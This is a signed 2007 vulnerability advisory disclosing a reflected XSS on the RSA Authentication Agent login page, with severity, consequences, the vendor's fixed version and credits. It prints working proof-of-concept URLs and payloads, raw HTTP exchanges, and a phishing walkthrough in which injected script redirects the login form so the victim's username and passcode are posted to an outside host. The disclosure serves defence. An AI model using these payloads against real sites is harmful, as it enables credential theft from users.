-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PR07-44: XSS on RSA Authentication Agent login page Vulnerability found: 5th December 2007 Vendor informed: 13th December 2007 Severity: Medium-high Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for Internet Information Services Description: RSA Authentication Agent is vulnerable to a vanilla XSS on the login page. Vulnerable server-side script: '/WebID/IISWebAgentIF.dll' Unfiltered parameter: 'postdata' Notes: It is believed that this vulnerability was originally reported in 2005 (BID 13168). However, In the original report, only version 5.2 of the Authentication Agent was mentioned to be vulnerable. Additionally, nothing was said regarding the possibility of exploiting this XSS as a GET request (as opposed to POST). Therefore, the vulnerability can be exploited via a malicious URL, since visiting a URL results in the web browser submitting a GET request. Since the XSS condition occurs on the login page, the bug is highly suitable for advanced XSS phishing attacks as illustrated in the proof of concept below. Please note that this is issue is different from CAN-2003-0389 and CVE-2005-3329. Simple XSS Proof of Concept (PoC) URLs: https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscod e&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3 C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscod e&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3 C/script%3E%3Ca%20b=%22 The injected payload in the previous examples is: "><script>alert("XSS")</script><a b=" The following specially-crafted URL performs an advanced XSS phishing attack. After the victim enters his/her username and passcode, the credentials are forwarded to a third-party site (procheckup.com in this case) and logged by the attacker: https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscod e&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0]. action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2 &username=anyvaluehere&passcode=anyvaluehere https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscod e&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0]. action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22 The injected payload in the previous examples is: "><script>document.forms[0].action="http://procheckup.com?"</script><a b=" Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a victim user who clicks on a link to a RSA Authentication Agent login page. Such code would run within the context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs or passwords) to unauthorised third parties. Fix: The vendor has stated that this issue was addressed in the RSA Authentication Agent 5.3.3.378. RSA customers can download the upgrade from the RSA web site. References: http://www.procheckup.com/Vulnerability_2007.php http://www.rsa.com/node.aspx?id=2807 Credits: found by Jan Fry and Adrian Pastor - ProCheckUp Ltd (www.procheckup.com). ProCheckUp thanks RSA for being so cooperative and responding so fast. COMPLETE HTTP REQUEST for simple XSS PoC: GET /WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid= 0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22 HTTP/1.1 User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3 Host: target-domain.foo Accept: */* PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag): HTTP/1.1 200 OK Connection: close Expires: 0 Date: Wed, 12 Dec 2007 17:32:08 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Cache-control: no-cache,max-age=0,must-revalidate <HTML> <HEAD> ~ <TITLE>RSA SecurID : Log In</TITLE> [ SNIP ] <INPUT TYPE=HIDDEN NAME="stage" VALUE="useridandpasscode"> <INPUT TYPE=HIDDEN NAME="referrer" VALUE="/"> <INPUT TYPE=HIDDEN NAME="sessionid" VALUE="0"> <INPUT TYPE=HIDDEN NAME="postdata" VALUE=""><script>alert("XSS")</script><a b=""> <INPUT TYPE=HIDDEN NAME="authntype" VALUE="2"> <TABLE class="form" cellspacing="0"> <TR> <TD class="label">User ID:</TD> <TD class="field"><INPUT TYPE=TEXT NAME="username" VALUE="" MAXLENGTH=32></TD> </TR> <TR> <TD class="label">Passcode:</TD> <TD class="field"><INPUT TYPE=PASSWORD NAME="passcode" VALUE="" MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN + the number displayed on your token (the Tokencode).</span></TD> </TR> </TABLE> </div> <P class="buttons"> <INPUT TYPE=SUBMIT VALUE="Log In"> <INPUT TYPE=RESET VALUE="Reset"> </P> </div> </FORM> </div> </BODY> </HTML> COMPLETE ATTACK WALK-THROUGH FOR XSS PHISHING ATTACK: Step 1: Victim is tricked to click on the specially-crafted URL: HTTP Request: GET /WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid= 0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http: //procheckup.com?%22%3C/script%3E%3Ca%20b=%22 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-gb UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322) Host: target-domain.foo Connection: Keep-Alive Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on "Log In": HTTP request - notice the victim's username and passcode are submitted to a third-party site (procheckup.com in this case): POST http: //procheckup.com/? HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-gb Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322) Host: procheckup.com Content-Length: 116 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=105825218.1973702853.1197971766.1197981134.1197988777.4; __utmz=105825218.1197971766.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=( none); __utmb=105825218 stage=useridandpasscode&referrer=%2F&sessionid=0&postdata=&authntype=2&u sername=MYUSERNAME&passcode=MYSECRETPASSWORD Legal: Copyright 2008 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFID2tsoR/Hvsj3i8sRAjgRAKC0Lvl/ZeP+UpIV4XZA4z4Tvt7lhwCgsU2J K7gMj25WIPIyHr1rDsbuSAA= =fLsl -----END PGP SIGNATURE-----